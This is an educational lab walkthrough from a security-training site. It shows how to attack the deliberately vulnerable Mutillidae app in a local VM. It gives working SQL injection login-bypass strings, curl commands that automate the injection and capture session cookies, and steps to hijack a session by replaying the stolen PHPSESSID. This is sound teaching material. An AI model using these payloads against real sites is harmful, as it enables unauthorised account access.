ComputerSecurityStudent (CSS) [Login] [Join Now]




|SECURITY TOOLS >> Mutillidae Project >> Mutillidae 2.5.11 >> Current Page |Views: 22490

(Mutillidae: Lesson 6)

{ SQL Injection, Burpsuite, cURL, Man-In-The-Middle Attack }


Section 0. Background Information
  • What is Mutillidae?
    • OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.

  • What is a SQL Injection?
    • SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
    • This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
    • The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

  • What is a Man-In-The-Middle attack?
    • The man-in-the-middle attack take on many forms.  The most common form is active network eavesdropping in which the attacker is able to gain authentication credentials (Username, Password, SESSIONID, Cookies Information, etc).

  • What is cURL?
    • cURL stands for "Client URL Request Library".
    • This is a command line tool for getting or sending files using URL syntax.
    • It supports a range of common Internet protocols, currently including HTTP, HTTPS, FTP, FTPS, SCP, SFTP, TFTP, LDAP, LDAPS, DICT, TELNET, FILE, IMAP, POP3, SMTP and RTSP.
    • (Damn Beautiful Tool in my opinion)

  • What is Burp Suite?
    • Burp Suite is a Java application that can be used to secure or crack web applications. The suite consists of different tools, such as a proxy server, a web spider, an intruder and a so-called repeater, with which requests can be automated.
    • When Burp suite is used as a proxy server and a web browser uses this proxy server, it is possible to have control of all traffic that is exchanged between the web browser and web servers. Burp makes it possible to manipulate data before it is sent to the web server.

  • What is Cookie Manager+?
    • Cookies manager to view, edit and create new cookies. It also shows extra information about cookies, allows edit multiple cookies at once and backup/restore them.

  • Pre-Requisite Lab
    1. Mutillidae: Lesson 1: How to Install Mutillidae in Fedora 14
      • Note: Remote database access has been turned on to provide an additional vulnerability.
    2. BackTrack: Lesson 1: Installing BackTrack 5 R1
      • Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
    3. Mutillidae: Lesson 5: Manual SQL Injection with Firebug
      • Note: This lab does contains all the heavy lifting and shows detailed explanations behind each exploit that will not be re-explained.
    4. BackTrack: Lesson 10: How To Install Cookies Manager+ 1.5.2

  • Lab Notes
    • In this lab we will do the following:
      1. We will use the same SQL Injection Vulnerabilities from the Previous Lab.
      2. We will capture the encoded form POST DATA submissions with Burp Suite.
      3. Then we will use the captured POST DATA to launch the SQL Injection using curl.  This is to illustrate how unfortunately easy it would be at automate an SQL Injection Attack.
      4. Finally, we will use the cookies from a successful SQL Injection to authenticate into Mutillidae without a password.  Note, this is one of many types of a man-in-the-middle attack.
  • Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • Your are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2013 No content replication of any kind is allowed without express written permission.

     

Section 1: Configure Fedora14 Virtual Machine Settings
  1. Start VMware Player
    • Instructions
      1. For Windows 7
        1. Click Start Button
        2. Search for "vmware player"
        3. Click VMware Player
      2. For Windows XP
        • Starts --> Programs --> VMware Player

     

  2. Edit Fedora Mutillidae Virtual Machine Settings
    • Instructions:
      1. Highlight Fedora14 - Mutillidae
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click the OK Button

 

Section 2: Login to Fedora14 - Mutillidae
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14 - Mutillidae
      3. Play virtual machine

     

  2. Login to Fedora14 - Mutillidae
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

 

Section 3: Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal

     

  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>

     

  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes (FYI):
      • As indicated below, my IP address is 192.168.1.111.
      • Please record your IP address.

 

Section 4: Configure BackTrack Virtual Machine Settings
  1. Start VMware Player
    • Instructions
      1. For Windows 7
        1. Click Start Button
        2. Search for "vmware player"
        3. Click VMware Player
      2. For Windows XP
        • Starts --> Programs --> VMware Player

     

  2. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings

     

  3. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

 

Section 5: Play and Login to BackTrack
  1. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine

     

  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  3. Bring up the GNOME
    • Instructions:
      1. Type startx

 

Section 6: Open Console Terminal and Retrieve IP Address
  1. On BackTrack, Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window

     

  2. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.109.
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Metasploitable).

 

Section 7: Start Web Browser Session to Mutillidae
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser

     

  2. Open Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. http://192.168.1.111/mutillidae

 

Section 8: Go To Login Page
  1. Go to Login
    • Instructions:
      1. Click on Login / Register

 

Section 9: Configure Firefox Proxy Settings
  1. View Preferences
    • Instructions:
      1. Edit --> Preferences

     

  2. Advanced Settings...
    • Instructions:
      1. Click on the Advanced Icon
      2. Click on the Network Tab
      3. Click on the Setting... button
     
  3. Connection Settings
    • Instructions:
      1. Click on Manual proxy configurations
      2. Type "127.0.0.1" in the HTTP Proxy Text Box
      3. Type "8080" in the Port Text Box
      4. Check Use the proxy server for all protocols
      5. Click OK
      6. Click Close

 

Section 10: Configure Burpsuite Settings
  1. Start Burp Suite
    • Instructions:
      1. Applications --> BackTrack --> Vulnerability Assessment --> Web Application Assessment ---> Web Application Proxies --> burpsuite

     

  2. JRE Message
    • Instructions:
      1. Click OK

     

  3. Configure proxy
    • Instructions:
      1. Click on the proxy tab
      2. Click on the options tab
      3. Verify the port is set to 8080

     

  4. Turn on intercept
    • Instructions:
      1. Click on the proxy tab
      2. Click on the intercept tab
      3. Verify the intercept button shows "intercept is off"

 

Section 11: SQL Injection: By-Pass Password Without Username (Obtain Access #1)
  1. Login Without Password
    • Instructions:
      1. Place the following in the Name Textbox --> ' or 1=1--
        • Make sure you put a space after the "-- "
      2. Click the Login Button
    • Note(FYI):
      • The string ' or 1=1--  placed in the below query means the following:
        • Search for username that is either equal to nothing OR where 1 is equal to 1.  So, we created a condition that is always true (OR 1=1).  The "-- " string is a comment in SQL.  We used this trick to comment out the rest of the SQL query (AND password=''), which eliminates that password authentication.
      • SELECT * FROM accounts WHERE username='' or 1=1-- ' AND password=''

     

  2. View Post Data (With Burp Suite)
    • Instructions:
      1. Click on the Proxy Tab
      2. Click on the History Tab
      3. Click on the line that contains --> /mutillidae/index.php?page=login.php
      4. Click on the Request Tab
      5. Click on the Raw Tab
      6. View the Post Data String
        • Later we will populate curl with this POST data string.
    • Note(FYI):
      • username=%27+or+1%3D1--+&password=&login-php-submit-button=Login
        1. %27 is a single quote (')
        2. + is a space
        3. %3D is a equal sign (=)

     

Section 12: Simulate CURL SQL Injection: (Obtain Access #1)
  1. Logout of Session
    • Instructions:
      1. Click Logout (See Picture)

     

  2. Use Curl to Login with POST Data
    • Note(FYI):
      • Replace 192.168.1.111 with Mutillidae's IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. curl -b crack_cookies.txt -c crack_cookies.txt --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" --data "username=%27+or+1%3D1--+&password=&login-php-submit-button=Login" --location "http://192.168.1.111/mutillidae/index.php?page=login.php" > login1.txt
      2. grep "Logged In" login1.txt
      3. cat crack_cookies.txt
    • Note(FYI):
      1. This curl statement provides the blueprint to automate SQL Injection attempts. Below is the form POST Data we obtained from Burpsuite (Section 11, Step 2).
        • --data "username=%27+or+1%3D1--+&password=&login-php-submit-button=Login"
      2. Notice that grep returns the positive result string "Logged In Admin".
      3. The crack_cookies.txt file contains the session cookies including the PHP session ID (PHPSESSID) and the UID of the user admin. 

 

Section 13: SQL Injection: Single Quote Test On Password Field (Obtain Access #2)
  1. Inspect Password Box Element
    • Instructions:
      1. Click Login/Register
      2. Name: samurai
      3. Password: Right Click
      4. Click the Inspect Element

     

  2. Edit Password Box Element
    • Instructions:
      1. Replace the string "password" with the word "text"
      2. After size=, replace the string "20" with "50"
      3. After maxlength=, replace the string "20" with "50"
      4. Minimize Firebug

     

  3. Apply Always True Test to Password Textbox
    • Instructions:
      1. Name: samurai
      2. Password: ' or (1=1 and username='samurai')--
        • Remember to put a space after the "-- ".
      3. Click the Login Button
    • Note(FYI):
      • Notice the Password textbox is no longer obfuscated and is now in plaintext

     

  4. View Post Data (With Burp Suite)
    • Instructions:
      1. Click on the Proxy Tab
      2. Click on the History Tab
      3. Click on the line that contains --> /mutillidae/index.php?page=login.php
      4. Click on the Request Tab
      5. Click on the Raw Tab
      6. Highlight all the text and right click
      7. Click "Copy to File"
        • Later we will populate curl with this POST data string.
    • Note(FYI):
      • username=samurai&password=%27+or+%281%3D1+and+username%3D%27samurai%27%29--+&login-php-submit-button=Login
        1. %27 is a single quote (')
        2. + is a space
        3. %28 is a left parenthesis
        4. %29 is a right parenthesis
        5. %3D is a equal sign (=)

     

  5. Save File
    • Instructions:
      1. Save In: root
      2. File Name: burp2.txt
      3. Click the Save Button

     

  6. View Post Data (With Burpsuite)
    • Instructions:
      1. cd /root
      2. grep -i cookie burp2.txt
      3. grep -i username burp2.txt
        • This is the form POST Data String.

     

  7. Logout of Session
    • Instructions:
      1. Click Logout (See Picture)
      2. Close Firefox

 

Section 14: Simulate cURL SQL Injection: (Obtain Access #2)
  1. Use Curl to Login with POST Data
    • Note(FYI):
      • Replace 192.168.1.111 with Mutillidae's IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. rm crack_cookies.txt
      2. grep -i username burp2.txt
        • This form POST Data string will be used in the following command.
      3. curl -b crack_cookies.txt -c crack_cookies.txt --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" --data "username=samurai&password=%27+or+%281%3D1+and+username%3D%27samurai%27%29--+&login-php-submit-button=Login" --location "http://192.168.1.111/mutillidae/index.php?page=login.php" > login2.txt
      4. grep "Logged In" login2.txt
      5. cat crack_cookies.txt
    • Note(FYI):
      1. This command provide the POST DATA String.  Take this string and place it in the next curl command.
      2. This curl statement provides the blueprint to automate SQL Injection attempts.
      3. Notice that grep returns the positive result string "Logged In".
      4. The crack_cookies.txt file contains the session cookies including the PHP session ID (PHPSESSID) and the UID of the user admin. 

 

Section 15: Restore Firefox Original Proxy Configurations
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser

     

  2. Firefox Preferences
    • Instructions:
      1. Edit --> Preferences

     

  3. Advanced Settings...
    • Instructions:
      1. Click on the Advanced Icon
      2. Click on the Network Tab
      3. Click on the Setting... button

     

  4. Connection Settings
    • Instructions:
      1. Click on the No proxy radio button
      2. Click on the OK button
      3. Click on the Close button

     

Section 16: Simulate Man-In-The-Middle Attack
  1. Start Cookies Manager+
    • Instructions:
      1. Tools --> Cookies Manager+
    • Notes (FYI):
      • Click here to install Cookie Manager+ you have not already done so.

     

  2. Add Cookie Entry
    • Instructions:
      1. Click the Add Button

     

  3. Add PHPSESSID Cookie Entry
    • Note(FYI):
      1. Replace nbag2jctr1p9vatb2g62pch8e2 with your PHPSESSID found in crack_cookies.txt (See Below Picture).
      2. Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. Name: PHPSESSID
      2. Content: nbag2jctr1p9vatb2g62pch8e2
      3. Host: 192.168.1.111
      4. Path: /
      5. Click the Save Button.

     

  4. Add Cookie Entry
    • Instructions:
      1. Click the Add Button

     

  5. Add showhints Cookie Entry
    • Note(FYI):
      1. Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. Name: showhints
      2. Content: 0
      3. Host: 192.168.1.111
      4. Path: /mutillidae/
      5. Click the Save Button

     

  6. Add Cookie Entry
    • Instructions:
      1. Click the Add Button

     

  7. Add username Cookie Entry
    • Note(FYI):
      1. Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. Name: username
      2. Content: samurai
      3. Host: 192.168.1.111
      4. Path: /mutillidae/
      5. Click the Save Button

     

  8. Add Cookie Entry
    • Instructions:
      1. Click the Add Button

     

  9. Add uid Cookie Entry
    • Note(FYI):
      1. Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. Name: uid
      2. Content: 6
      3. Host: 192.168.1.111
      4. Path: /mutillidae/
      5. Click the Save Button
      6. Click the Close Button

     

  10. Add uid Cookie Entry
    • Note(FYI):
      1. Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
      2. Notice you will be automagically logged in without a password.  For this reason, it is extremely important that session information is (1) not only encrypted, (2) but also users logout after they finish their session.
    • Instructions:
      1. http://192.168.1.111/mutillidae/index.php

 

Section 17: Proof of Lab
  1. Proof of Lab, (On a BackTrack Terminal)
    • Instructions:
      1. cd /root
      2. ls -l login*
      3. cat crack_cookies.txt
      4. date
      5. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions
      1. Press both the <Ctrl> and <Alt> keys at the same time.
      2. Do a <PrtScn>
      3. Paste into a word document
      4. Upload to Moodle


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth